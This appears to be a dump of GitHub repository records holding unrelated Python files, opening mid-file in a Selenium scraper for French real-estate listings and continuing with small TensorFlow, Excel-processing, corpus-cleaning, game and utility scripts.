local_timestamp_construction = datetime.datetime.strptime(\n year_of_construction,\n format_string_construction\n )\n year_of_construction = local_timestamp_construction.replace(\n tzinfo=pytz.timezone('UTC')\n ).timestamp()\n\n # exposition\n elif \"exposé\" in element_text:\n pattern_exposition = r'exposé\\s(.+)'\n exposition = re.findall(pattern_exposition, element_text)[0]\n\n # floor\n # total_floor_number\n elif \"étage\" in element_text:\n pattern_floor = r'^[0-9]+'\n pattern_floor_number = r'sur\\s+(\\d+)'\n\n if \"dernier\" in element_text:\n floor = total_floor_number\n else:\n floor = int(re.findall(pattern_floor, element_text)[0])\n\n if \"sur\" in element_text:\n total_floor_number = int(re.findall(pattern_floor_number, element_text)[0])\n else:\n total_floor_number = None\n\n # bedroom_number\n elif \"chambre\" in element_text:\n bedroom_number = re.findall(regex_find_numbers, element_text)[0]\n\n # toilet_number\n elif \"wc\" in element_text:\n if \"séparé\" in element_text:\n continue\n else:\n toilet_number = re.findall(regex_find_numbers, element_text)[0]\n\n # bathroom_number\n elif \"bain\" in element_text:\n bathroom_number = re.findall(regex_find_numbers, element_text)[0]\n\n # cellar\n elif \"cave\" in element_text:\n cellar = True\n\n # lock_up_garage\n elif \"box\" in element_text:\n lock_up_garage = True\n\n # heating\n elif \"chauffage\" in element_text:\n heating = re.findall(regex_find_text_after_colon, element_text)[0]\n\n # tv_cable\n elif \"tv\" in element_text:\n tv_cable = True\n\n # fireplace\n elif \"cheminée\" in element_text:\n fireplace = True\n\n # digicode\n elif \"digicode\" in element_text:\n digicode = True\n\n # intercom\n elif \"interphone\" in element_text:\n intercom = True\n\n # elevator\n elif \"ascenseur\" in element_text:\n elevator = True\n\n # fibre_optics_status\n elif \"fibre\" in element_text:\n fibre_optics_status = re.findall(\n regex_find_text_after_colon,\n element_text\n )[0].replace(\"*\", \"\")\n\n # garden\n elif \"jardin\" in element_text:\n garden = True\n\n # car_park_number\n elif \"parking\" in element_text:\n if functions.contains_numbers(element_text) is True:\n car_park_number = re.findall(regex_find_numbers, element_text)[0]\n else:\n car_park_number = None\n\n # balcony\n elif \"balcon\" in element_text:\n balcony = True\n\n # large_balcony\n elif \"terrasse\" in element_text:\n large_balcony = True\n\n # estate_agency_fee_percentage\n # elif \"honoraires :\" in element_text:\n # pattern = r'[\\d,]+%'\n # estate_agency_fee_percentage = re.findall(\n # pattern,\n # element_text\n # )[0].replace(\"%\", \"\")\n\n # pinel\n elif \"pinel\" in element_text:\n pinel = True\n\n # denormandie\n elif \"denormandie\" in element_text:\n pinel = True\n\n # announce_publication\n elif \"publiée\" in element_text:\n if \"il y a plus\" in element_text:\n announce_publication = None\n else:\n publication_french_date = re.findall(r'le\\s(.+)', element_text)[0]\n announce_publication = functions.date_converter_french_date_to_utc_timestamp(\n publication_french_date\n )\n\n # announce_last_modification\n elif \"modifiée\" in element_text:\n modification_french_date = re.findall(r'le\\s(.+)', element_text)[0]\n announce_last_modification = functions.date_converter_french_date_to_utc_timestamp(\n modification_french_date\n )\n\n # dpe_date\n elif \"dpe\" in element_text:\n dpe_french_date = re.findall(regex_find_text_after_colon, element_text)[0]\n dpe_date = functions.date_converter_french_date_to_utc_timestamp(dpe_french_date)\n\n # batch\n # elif \"lot\" in element_text:\n # batch = re.findall(regex_find_numbers, element_text)[0]\n\n else:\n continue\n\n except (NoSuchElementException, StaleElementReferenceException):\n print(\"KO : no data elements found\")\n\n # neighborhood_description\n try:\n neighborhood_description = driver.find_element(\n By.CSS_SELECTOR,\n \"div.neighborhoodDescription span\"\n )\n neighborhood_description = neighborhood_description.text\n except (NoSuchElementException, StaleElementReferenceException):\n print(\"KO : no data for neighborhood_description\")\n\n # energetic_performance_letter\n try:\n energetic_performance_letter = driver.find_element(\n By.CSS_SELECTOR,\n \"div.dpe-line__classification span div\"\n )\n energetic_performance_letter = energetic_performance_letter.text\n except (NoSuchElementException, StaleElementReferenceException):\n print(\"KO : no data for energetic_performance_letter\")\n\n # energetic_performance_number && climatic_performance_number\n try:\n dpe_data_numbers = driver.find_elements(\n By.CSS_SELECTOR,\n \"div.dpe-data div.value span\"\n )\n if dpe_data_numbers:\n if dpe_data_numbers[0].text == \"-\":\n energetic_performance_number = None\n else:\n energetic_performance_number = int(dpe_data_numbers[0].text)\n\n if dpe_data_numbers[1].text == \"-\":\n climatic_performance_number = None\n else:\n climatic_performance_number = int(dpe_data_numbers[1].text.replace(\"*\", \"\"))\n\n except (NoSuchElementException, StaleElementReferenceException):\n print(\"KO : no data for energetic_performance_number\")\n\n # climatic_performance_letter\n try:\n climatic_performance_letter = driver.find_element(By.CSS_SELECTOR,\n \"div.ges-line__classification span\"\n )\n climatic_performance_letter = climatic_performance_letter.text\n except (NoSuchElementException, StaleElementReferenceException):\n print(\"KO : no data for climatic_performance_letter\")\n\n print(\"------------------Description Part End------------------\")\n print(\"--------------------------------------------------------\")\n print(\"----------------------Agency Part-----------------------\")\n\n # estate_agency\n estate_agency_name = \"\"\n estate_agency_address = \"\"\n estate_agency_evaluation = \"\"\n\n # name\n try:\n estate_agency_name = driver.find_element(By.CSS_SELECTOR,\n \"div.agency-overview__info-name\"\n )\n estate_agency_name = estate_agency_name.text\n except (NoSuchElementException, StaleElementReferenceException):\n print(\"KO : no data for estate_agency name \")\n estate_agency_name = None\n\n # address\n try:\n estate_agency_address = driver.find_element(By.CSS_SELECTOR,\n \"\"\"div.agency-overview__contact-address\n div.contact-address\"\"\"\n )\n estate_agency_address = estate_agency_address.text\n\n except (NoSuchElementException, StaleElementReferenceException):\n print(\"KO : no data for estate_agency address\")\n estate_agency_address = None\n\n # fee_percentage\n # value caught above\n\n # evaluation\n try:\n estate_agency_evaluation = driver.find_element(\n By.CSS_SELECTOR,\n \"span.rating-stars__rating-text\"\n )\n estate_agency_evaluation = estate_agency_evaluation.text\n except (NoSuchElementException, StaleElementReferenceException):\n print(\"KO : no data for estate_agency evaluation\")\n estate_agency_evaluation = None\n\n print(\"estate_agency_name\", estate_agency_name)\n print(\"estate_agency_address\", estate_agency_address)\n print(\"estate_agency_fee_percentage\", estate_agency_fee_percentage)\n print(\"estate_agency_evaluation\", estate_agency_evaluation)\n\n result = database_app.get_agency_by_name(estate_agency_name)\n print(\"result\", result)\n\n if not database_app.get_agency_by_name(estate_agency_name) or estate_agency_name is None:\n print(\"stepagency1\")\n database_app.add_agency(estate_agency_name,\n estate_agency_address,\n estate_agency_fee_percentage,\n estate_agency_evaluation\n )\n print(\"stepagency2\")\n print(f\"OK : {estate_agency_name} estate_agency has been added to database\")\n else:\n print(\"stepagency3\")\n print(f\"KO : {estate_agency_name} estate_agency already exits\")\n\n try:\n estate_agency_id = database_app.get_agency_id_from_name(estate_agency_name)[0][0]\n except IndexError:\n if not estate_agency_id:\n estate_agency_id = None\n\n print(\"estate_agency_id\", estate_agency_id)\n print(\"------------------Agency Part End------------------\")\n\n print(f\"------------------Add Description {id_property}------------------\")\n print(\"#############RECAP ANNOUNCE VARIABLES#############\")\n print(\"year_of_construction :\", year_of_construction)\n print(\"exposition :\", exposition)\n print(\"floor :\", floor)\n print(\"total_floor_number :\", total_floor_number)\n print(\"neighborhood_description :\", neighborhood_description)\n print(\"bedroom_number :\", bedroom_number)\n print(\"toilet_number :\", toilet_number)\n print(\"bathroom_number :\", bathroom_number)\n print(\"cellar :\", cellar)\n print(\"lock_up_garage :\", lock_up_garage)\n print(\"heating :\", heating)\n print(\"tv_cable :\", tv_cable)\n print(\"fireplace :\", fireplace)\n print(\"digicode :\", digicode)\n print(\"intercom :\", intercom)\n print(\"elevator :\", elevator)\n print(\"fibre_optics_status :\", fibre_optics_status)\n print(\"garden :\", garden)\n print(\"car_park_number :\", car_park_number)\n print(\"balcony :\", balcony)\n print(\"large_balcony :\", large_balcony)\n print(\"dpe_date :\", dpe_date)\n print(\"estate_agency_fee_percentage :\", estate_agency_fee_percentage)\n print(\"pinel :\", pinel)\n print(\"denormandie :\", denormandie)\n print(\"announce_publication :\", announce_publication)\n print(\"announce_last_modification :\", announce_last_modification)\n print(\"energetic_performance_letter :\", energetic_performance_letter)\n print(\"energetic_performance_number :\", energetic_performance_number)\n print(\"climatic_performance_number :\", climatic_performance_number)\n print(\"climatic_performance_letter :\", climatic_performance_letter)\n\n database_app.add_description(id_property,\n year_of_construction,\n exposition,\n floor,\n total_floor_number,\n neighborhood_description,\n bedroom_number,\n toilet_number,\n bathroom_number,\n cellar,\n lock_up_garage,\n heating,\n tv_cable,\n fireplace,\n digicode,\n intercom,\n elevator,\n fibre_optics_status,\n garden,\n car_park_number,\n balcony,\n large_balcony,\n estate_agency_fee_percentage,\n pinel,\n denormandie,\n announce_publication,\n announce_last_modification,\n dpe_date,\n energetic_performance_letter,\n energetic_performance_number,\n climatic_performance_number,\n climatic_performance_letter,\n estate_agency_id\n )\n\n print(\"------------------End Add Description------------------\")\n\n else:\n print(f\"OK : property {id_property} already has a description\")\n","repo_name":"jeanlouisHERVE/IMMO-SCRAPER","sub_path":"modules/add_announces.py","file_name":"add_announces.py","file_ext":"py","file_size_in_byte":31187,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15747678769","text":"#!/usr/bin/env python3\n# coding=utf-8\n\nimport tensorflow as tf\n\nwith tf.Graph().as_default(), tf.Session() as sess:\n a = tf.constant([5, 3, 2, 7, 1, 4])\n b = tf.constant([4, 6, 3])\n print('a = \\n%s' % a.eval())\n print('b = \\n%s' % b.eval())\n reshaped_a = tf.reshape(a, [2, 3])\n reshaped_b = tf.reshape(b, [3, 1])\n print('ra = \\n%s' % reshaped_a.eval())\n print('rb = \\n%s' % reshaped_b.eval())\n c = tf.matmul(reshaped_a, reshaped_b)\n print('c = \\n%s' % c.eval())\n\nwith tf.Graph().as_default(), tf.Session() as sess:\n dice1 = tf.Variable(tf.random_uniform([10, 1],\n minval=1, maxval=7,\n dtype=tf.int32))\n dice2 = tf.Variable(tf.random_uniform([10, 1],\n minval=1, maxval=7,\n dtype=tf.int32))\n\n dice_sum = tf.add(dice1, dice2)\n\n resulting_matrix = tf.concat(\n values=[dice1, dice2, dice_sum], axis=1)\n\n sess.run(tf.global_variables_initializer())\n\n print('result = \\n%s' % resulting_matrix.eval())\n","repo_name":"qianhk/FeiPython","sub_path":"Python3Test/tensorfly/google_research.py","file_name":"google_research.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36552910800","text":"import matplotlib.pyplot as plt\nimport cv2\nimport numpy as np\nimport time\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torchvision import models\n\nclass SingleStream(nn.Module):\n \"\"\"Single Stream (Spatial OR Temporal) + LSTM\"\"\"\n def __init__(self):\n super().__init__()\n self.cnn = models.vgg19_bn(pretrained=True)\n num_fts = self.cnn.classifier[3].in_features\n self.cnn.classifier = nn.Sequential(\n *list(self.cnn.classifier.children())[:-4]\n )\n # add lstm layer\n self.lstm = nn.LSTM(num_fts, 512, 2)\n # add linear layer\n self.fc = nn.Linear(512, 4)\n\n def forward(self, inputs):\n \"\"\"Forward pass through network.\n Args:\n inputs (torch.Tensor): tensor of dimensions\n [numSeqs x batchSize x numChannels x Width x Height]\n Returns:\n torch.Tensor: final output of dimensions\n [batchSize x numClasses]\n \"\"\"\n # list to hold features\n feats = []\n # for each input in sequence\n for inp in inputs:\n # pass through cnn\n outs = self.cnn.forward(inp).data\n feats.append(outs)\n \n # format features and store in Variable\n feats = torch.stack(feats)\n feats = Variable(feats)\n # pass through LSTM\n outputs, _ = self.lstm(feats)\n outputs = self.fc(outputs[-1])\n return outputs\n\ncap = cv2.VideoCapture('data/dashcam_test.mp4')\nmean = np.array([0.485, 0.456, 0.406])\nstd = np.array([0.229, 0.224, 0.225])\n\nnet = SingleStream()\nnet = net.cuda()\nprint(net)\n\ninputs_list = [torch.zeros(1,3,224,224) for i in range(20)]\n\ncount = 0\nwhile cap.isOpened():\n start_time = time.time()\n ret, frame = cap.read()\n if ret is False:\n break\n\n # use frame as input\n inp = cv2.resize(frame, (224, 224))\n inp = cv2.cvtColor(inp, cv2.COLOR_BGR2RGB)\n inp = inp / 255\n inp = (inp - mean) / std\n inp = inp.transpose(2,0,1)\n inp = torch.from_numpy(inp).type(torch.FloatTensor)\n inp = inp.unsqueeze(0)\n inputs_list.append(inp)\n inputs_list.pop(0)\n inputs = Variable(torch.stack((inputs_list)).cuda())\n print('inputs:', inputs.shape)\n outputs = net.forward(inputs)\n print('outputs:', outputs.shape)\n _, pred = torch.max(outputs.data, 1)\n cv2.putText(frame, str(pred[0]), (1200,80), cv2.FONT_HERSHEY_SIMPLEX,\n 3, (0,0,255), 4)\n fps = round(1 / (time.time()-start_time), 1)\n print(\"FPS: \", fps)\n cv2.putText(frame, 'fps:' + str(fps), (20,70), cv2.FONT_HERSHEY_SIMPLEX,\n 2, (0,0,255), 3)\n file_name = 'data/images/test_' + str(count) + '.png'\n cv2.imwrite(file_name, frame)\n count += 1\n\nprint('Done')\n","repo_name":"gcorcorann/OnlineAttention","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33012849278","text":"# Read n and p\r\nn, p = input().split()\r\n# Typecast str to int\r\nn = int(n)\r\n# Read the investment prices\r\na = list(map(str, input().split()))[:n]\r\n# Read profit prices\r\nb = list(map(str, input().split()))[:n]\r\n# typecast str to int of investment prices\r\nfor i in range(len(a)):\r\n a[i] = int(a[i][1:])\r\n# typecast str to int of profit\r\nfor i in range(len(b)):\r\n b[i] = int(b[i][1:])\r\n# get totalprofit\r\ntotalProfit = 0\r\n\r\n# available money\r\nmoney = int(p[1:])\r\n\r\n# sort the projects according to the investment value\r\nprojectList = []\r\nfor i in range(n):\r\n # get ith project and append into the project list\r\n currentProject = []\r\n currentProject.append(a[i])\r\n currentProject.append(b[i])\r\n projectList.append(currentProject)\r\n# sort all projects\r\nprojectList.sort()\r\n\r\nfor i in range(n):\r\n # if available money is greater than the ith project investment value\r\n # then get initial money + profit\r\n # also add the profit into total profit\r\n if money >= projectList[i][0]:\r\n money += projectList[i][1]\r\n totalProfit += projectList[i][1]\r\n\r\n\r\n# Display total Profit\r\ntotalProfit = \"$\"+str(totalProfit)\r\nprint(totalProfit)\r\n\r\n\r\n# Time Compexity:O(n*logn)\r\n# Explanation: For sorting required (n*logn time) + we are taking O(n) to iterate projects\r\n# Hence overall time xomplexity :O(n*logn)","repo_name":"Nilesh1206/mission_faang","sub_path":"Chegg/235_Optimize.py","file_name":"235_Optimize.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"72933515113","text":"from __future__ import print_function\nimport os\n\ndef read_fasta_seq(file_handle):\n ''' generator that reads two lines at a time, yields just the sequence '''\n first = file_handle.readline()\n second = file_handle.readline()\n if not first.startsWith(\">\"):\n print(\"data_load_utils.read_fasta_seq_block error: expected a FASTA line, but got sequence instead\")\n yield \"barf\"\n else:\n yield second.strip().upper()\n \n\ndef get_test_data_files():\n data_dir = \"./test_data\"\n return [os.path.join(data_dir, test_file) for test_file in os.listdir(\"./test_data/\") if test_file.endswith(\".fa\")]\n\n\ndef load_data_from_file(filename, trunc=0):\n test_file = open(filename,'r')\n lines = test_file.readlines()\n test_file.close()\n if trunc == 0:\n return [seq.strip() for seq in lines if not seq.startswith('>')]\n else:\n return [seq.strip()[0:trunc] for seq in lines if not seq.startswith('>')]\n\n","repo_name":"lzamparo/SeqDemote","sub_path":"tests/data_load_utils.py","file_name":"data_load_utils.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"39833051069","text":"dct = {'person': {'in_dict': [1, 2, 3],\n\n 'after_list': {4, '5'},\n\n 'after_set': ('hello', )}}\n\nkey1 = []\nvalue1 = []\n\nfor i in dct.values():\n for key, value in i.items():\n key1.append(key)\n value1.append(value)\n\nfor i in value1:\n for j in i:\n key1.append(j)\n value1.append('')\n\nnew_dct = {key: value for key, value in zip(key1, value1)}\n\nprint(new_dct)\n","repo_name":"kopachmaksym/LogosItAcademy","sub_path":"Урок 4.py","file_name":"Урок 4.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19686616360","text":"\"\"\"Rock Paper Scissors\n--------------------------------\n\"\"\"\n\nimport random\n\nscore_player = 0\nscore_computer = 0\noptions = ['rock', 'paper', 'scissors']\nrandom.seed(42)\n\ndef results(a,b) :\n \"\"\"This functions takes the value played by two players\n and determines who is the winner\"\"\"\n \n round_winner = 0\n \n if a == b:\n round_winner = 0\n elif a + b == 5 or a + b == 3:\n if a > b :\n round_winner = 1\n else :\n round_winner = 2\n elif a + b == 4:\n if a < b :\n round_winner = 1\n else :\n round_winner = 2\n \n if round_winner == 1:\n print(\"You win this round\")\n elif round_winner == 2:\n print(\"You loose this round\")\n else:\n print(\"Draw\")\n\n return round_winner\n\ndef computer_play() :\n \"\"\"This defines what the computer plays in each round\"\"\"\n\n value_computer = ''\n\n b = random.randint(1,2)\n\n if b == 1:\n value_computer = 'Rock'\n elif b == 2:\n value_computer = 'Paper'\n elif b == 3:\n value_computer = 'Scissors'\n\n print('The computer played :', value_computer)\n\n return b \n\n## While condition\n\nwhile score_player < 3 and score_computer < 3:\n \n value_player = input(\"Rock, Paper, Scissors ?:\\n\").lower()\n\n while value_player not in options:\n value_player = input(\"Please pick from Rock, Paper, Scissors :\\n\")\n else:\n print('You played ', value_player,' !')\n \n if value_player == 'rock':\n a = 1\n elif value_player == 'paper':\n a = 2\n elif value_player == 'scissors':\n a = 3\n\n b = computer_play()\n\n round_winner = results(a,b)\n\n if round_winner == 1:\n score_player += 1\n elif round_winner == 2:\n score_computer += 1\n \n print('Your score: ',score_player,' vs. Computer score ', score_computer)\n\nif score_player == 3:\n print('You win !!!')\nelse:\n print('The computer wins :)')","repo_name":"abiais/projects","sub_path":"python/rock_paper_scissors.py","file_name":"rock_paper_scissors.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40403159001","text":"# да приемем че имаме уеб сайт, чрез който потребителите могат да си създават профили като подават име, имейл и\n# дата на раждане. Можем да използва декоратор, за да ни помогне да валидираме данните.\n\nfrom datetime import datetime, timedelta\n\n\ndef validate_profile(func):\n def wrapper(name, email, dob):\n try:\n # check that dob is in the correct format (YYYY-MM-DD)\n dob = datetime.strptime(dob, \"%Y-%m-%d\")\n\n # check that user is at least 18 years old\n eighteen_years_ago = datetime.now() - timedelta(days=365 * 18)\n if dob > eighteen_years_ago:\n raise ValueError(\"You must be at least 18 years old to create profile\")\n\n except ValueError as e:\n return str(e)\n\n # if dob is valid call the original function with the arguments\n return func(name, email, dob)\n\n return wrapper\n\n\n@validate_profile\ndef create_profile(name, email, dob):\n # code create user profile\n return \"Profile created successfully\"\n\n\nresult = create_profile('Ivan Ivanov', 'ivan@gmail.com', '2012-03-21')\nprint(result)","repo_name":"GGeorgiDY/Python-OOP-Jan2023","sub_path":"17.Decorators_-_Lab/example - validate_profile.py","file_name":"example - validate_profile.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"bg","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16169107619","text":"import openpyxl\nfrom PyQt5 import QtCore\nimport time\n\n\nclass Main(QtCore.QThread):\n percentageChanged = QtCore.pyqtSignal(int)\n indicator_of_end_work = QtCore.pyqtSignal(bool)\n\n def __init__(self, nameOfOutFile, nameOfInFile, count):\n super().__init__()\n self.nameOfOutFile = nameOfOutFile\n self.nameOfInFile = nameOfInFile\n self.count = count\n self.time = time\n\n def run(self):\n wbIn = openpyxl.load_workbook(filename=self.nameOfInFile)\n sheetIn = wbIn['Sheet']\n dataIn = sheetIn.values\n dataIn = list(dataIn)\n\n wbOut = openpyxl.load_workbook(filename=self.nameOfOutFile)\n sheetOut = wbOut['Лист1']\n dataOut = sheetOut.values\n dataOut = list(dataOut)\n\n for j in range(5):\n self.count += 1\n self.percentageChanged.emit(self.count)\n\n # СОЗДАНИЕ ЛИСТОВ С ФАМИЛИЯМИ И ВРЕМЕНЕМ ПРИХОДА И УХОДА\n i = 0\n dataNameIn = []\n while i != sheetIn.max_row:\n dataNameIn.append(dataIn[i][3])\n i += 1\n j = 0\n dataNameOut = []\n while j != sheetOut.max_row:\n dataNameOut.append(dataOut[j][4] + ' ' + dataOut[j][5] + ' ' + dataOut[j][6])\n j += 1\n\n i = 0\n oneSecondName = 0\n while dataNameOut[i] == dataNameOut[i + 1]:\n oneSecondName += 1\n i += 1\n\n i = 0\n dataTimeIn = []\n dataTimeInExit = []\n while i != sheetIn.max_row:\n dataTimeIn.append(dataIn[i][5])\n dataTimeInExit.append(dataIn[i][6])\n i += 1\n\n j = 0\n dataTimeOut = []\n dataTimeOutExit = []\n while j != sheetOut.max_row:\n dataTimeOut.append(dataOut[j][7])\n dataTimeOutExit.append(dataOut[j][8])\n j += 1\n\n for j in range(5):\n self.count += 1\n self.percentageChanged.emit(self.count)\n\n print(\"Сравнение времени входа\")\n # Сравнение времени входа\n for j in range(len(dataNameIn)):\n i = 0\n while i <= len(dataNameOut):\n for h in range(oneSecondName):\n if (i + h) < len(dataNameOut):\n if dataNameIn[j] == dataNameOut[i + h]:\n tmpData = str(dataTimeIn[j])[0:2]\n if tmpData != \"Пр\":\n if dataTimeOut[i + int(tmpData) - 1] is None:\n sheetOut.cell(row=i + int(tmpData), column=8).value = dataTimeIn[j]\n break\n else:\n if (str(dataTimeIn[j])[:10] == str(dataTimeOut[i + int(tmpData) - 1])[:10]) and (\n str(dataTimeIn[j])[11:] < str(dataTimeOut[i + int(tmpData) - 1])[11:]):\n sheetOut.cell(row=i + int(tmpData), column=8).value = dataTimeIn[j]\n break\n else:\n if dataTimeOut[i + int(str(dataTimeInExit[j])[0:2]) - 1] is None:\n sheetOut.cell(row=i + int(str(dataTimeInExit[j])[0:2]), column=8).value = \\\n dataTimeIn[j]\n else:\n break\n else:\n break\n i += oneSecondName + 1\n wbOut.save(filename=self.nameOfOutFile)\n print(\"Время входа поменялось!\")\n\n for j in range(5):\n self.count += 1\n self.percentageChanged.emit(self.count)\n\n # Сравнение времени выхода\n for j in range(len(dataNameIn)):\n i = 0\n while i <= len(dataNameOut):\n for h in range(oneSecondName):\n if (i + h) < len(dataNameOut):\n if dataNameIn[j] == dataNameOut[i + h]:\n tmpData = str(dataTimeInExit[j])[0:2]\n if tmpData != \"Пр\":\n if dataTimeOutExit[i + int(tmpData) - 1] is None:\n sheetOut.cell(row=i + int(tmpData), column=9).value = dataTimeInExit[j]\n break\n else:\n if (str(dataTimeInExit[j])[:10] == str(dataTimeOutExit[i + int(tmpData) - 1])[\n :10]) and (\n str(dataTimeInExit[j])[11:] > str(dataTimeOutExit[i + int(tmpData) - 1])[\n 11:]):\n sheetOut.cell(row=i + int(tmpData), column=9).value = dataTimeInExit[j]\n break\n else:\n if (dataTimeOutExit[i + int(str(dataTimeIn[j][0:2])) - 1]) is None:\n sheetOut.cell(row=i + int(str(dataTimeIn[j][0:2])), column=9).value = \\\n dataTimeInExit[j]\n else:\n break\n else:\n break\n i += oneSecondName + 1\n print(\"Время выхода поменялось!\")\n wbOut.save(filename=self.nameOfOutFile)\n\n for j in range(5):\n self.count += 1\n self.percentageChanged.emit(self.count)\n\n self.indicator = True\n self.indicator_of_end_work.emit(self.indicator)\n","repo_name":"Sushken/skud-report-structure","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":5821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2005265007","text":"import sqlite3 as db\n\n\ndef add_db(tgId,group):\n\n con = db.connect('myDb.db')\n group = group\n\n cur = con.cursor()\n cur.execute(f\"SELECT * FROM users\")\n data = cur.fetchall()\n\n if data:\n msg = 'You are already in db, bastard'\n cur.close()\n else:\n cur.execute( f'INSERT INTO users VALUES ({tgId},\"{group}\");')\n cur.close()\n msg = 'You are added to db'\n\n con.commit()\n return msg\n","repo_name":"Furfin/FMS_BOT","sub_path":"telebot/db_controller.py","file_name":"db_controller.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28020042675","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\n\nfrom torchtext.datasets import TranslationDataset, Multi30k\nfrom torchtext.data import Field, BucketIterator\nimport os\nimport random\nimport math\nimport time\n\nfrom functions import *\n\n# Get input_size and output(dimensionality of the one-hot vectors that will be input to the encoder/decoder.)\n# The Preprocessing steps will deliver temporal outputs for saving memory space.\nremoveEmptyParallel('en-bg.en','en-bg.bg')\nremoveDuplicateParallel('en-bg.en.noEmpty.sl','en-bg.en.noEmpty.sl')\nos.remove('en-bg.en.noEmpty.sl')\nos.remove('en-bg.bg.noEmpty.tl')\nsrc_vocab=text2vocab('en-bg.en.noEmpty.sl.noDuplicate.sl',200)\ntgt_vocab=text2vocab('en-bg.en.noEmpty.sl.noDuplicate.tl',200)\nos.remove('en-bg.en.noEmpty.sl.noDuplicate.sl')\nos.remove('en-bg.en.noEmpty.sl.noDuplicate.tl')\n\nINPUT_DIM = len(SRC.vocab)\nOUTPUT_DIM = len(TRG.vocab)\nENC_EMB_DIM = 256\nDEC_EMB_DIM = 256\nHID_DIM = 512\nN_LAYERS = 2\nENC_DROPOUT = 0.5\nDEC_DROPOUT = 0.5\n\nenc = Encoder(INPUT_DIM, ENC_EMB_DIM, HID_DIM, N_LAYERS, ENC_DROPOUT)\ndec = Decoder(OUTPUT_DIM, DEC_EMB_DIM, HID_DIM, N_LAYERS, DEC_DROPOUT)\n\nmodel = Seq2Seq(enc, dec, device).to(device)\n\n# Prepare train, val and test sets\n\n\n\n# Initialize weights in PyTorch by creating a function\n\ndef init_weights(m):\n for name, param in m.named_parameters():\n nn.init.uniform_(param.data, -0.08, 0.08)\n\nmodel.apply(init_weights)\n\ndef count_parameters(model):\n return sum(p.numel() for p in model.parameters() if p.requires_grad)\n\nprint(f'The model has {count_parameters(model):,} trainable parameters')\n\noptimizer=optim.Adam(model.parameters())\n\n# PAD_IDX=TRG.vocab.stoi['']\ncriterion=nn.CrossEntropyLoss(ignore_index=PAD_IDX)\n\ndef train(model, iterator, optimizer, criterion, clip ):\n model.train()\n epoch_loss=0\n for i, batch in enumerate(iterator):\n src=batch.src\n trg=batch.trg\n\n optimizer.zero_grad()\n output=model(src, trg)\n\n # trg = [trg sent len, batch size]\n # output = [trg sent len, batch size, output dim]\n\n output = output[1:].view(-1, output.shape[-1])\n trg = trg[1:].view(-1)\n\n # trg = [(trg sent len - 1) * batch size]\n # output = [(trg sent len - 1) * batch size, output dim]\n\n loss=criterion(output, trg)\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), clip)\n\n optimizer.step()\n epoch_loss += loss.item()\n\n return epoch_loss / len(iterator)\n\n\n\n","repo_name":"hanjingyi/seq2seq_attention_pytorch","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12136832583","text":"import numpy as np\n\nfilename = \"./Python/1D3Z_mod1.pdb\"\nnew_filename = \"./Python/coordinates_H.txt\"\n\narr = np.genfromtxt(filename, dtype='str')\n\narr = arr[:, 5:8].astype(np.float)\n\nnp.savetxt(new_filename, arr)\n","repo_name":"ehb54/nmrsuite","sub_path":"sassie_modifications/analyze/pre/From_Matthew/PRE_first/coordinates_H_create.py","file_name":"coordinates_H_create.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"1240393192","text":"import numpy as np\nfrom collections import Counter\nfrom matplotlib import pyplot as plt\n\n\n## Room observation likelihood\ndef get_room_observation_likelihood(N=33, doors=np.array([4, 11, 26]),\\\n pulse=np.array([0.2, 0.8, 1, 0.8, 0.2]), noise=0.05):\n uniform = np.zeros(N)\n uniform[doors-1] = 1\n unnormalized = np.roll(convolve(uniform, pulse), -int((len(pulse)-1)/2))\n unnormalized[unnormalized == 0] = noise\n likelihood = {}\n likelihood['door'] = unnormalized\n likelihood['wall'] = 1-unnormalized\n return likelihood\n\n## Additive noise functions\ndef get_gaussian_distribution(N=21, loc=1, scale=2):\n center = int(int(N+1)/2)\n x = np.linspace(1, N, N)\n x = x - center\n sigma = scale*2\n pdf = np.exp(-x*x/(2*sigma))\n n = center - loc\n return np.roll(pdf/pdf.sum(), -n)\n\ndef get_rayleigh_distribution(N=21, loc=1, scale=2):\n center = int(int(N+1)/2)\n x = np.linspace(1, N, N)\n sigma = scale*4\n x = x - center + np.sqrt(sigma)\n pdf = (x >= 0)*(x*np.exp(-x*x/(2*sigma))/sigma)\n n = center - loc\n return np.roll(pdf/pdf.sum(), -n)\n\ndef get_exponential_distribution_symetric(N=21, loc=1, scale=2):\n indexes = np.linspace(1, N, N)\n center = int(int(len(indexes)+1)/2)\n exponential_dist = np.exp(-abs(indexes-center)/scale)\n exponential_dist = exponential_dist/exponential_dist.sum()\n n = center - loc\n return np.roll(exponential_dist, -n)\n\ndef get_exponential_distribution(N=21, loc=1, scale=2, mirror=False):\n indexes = np.linspace(1, N, N)\n exponential_dist = 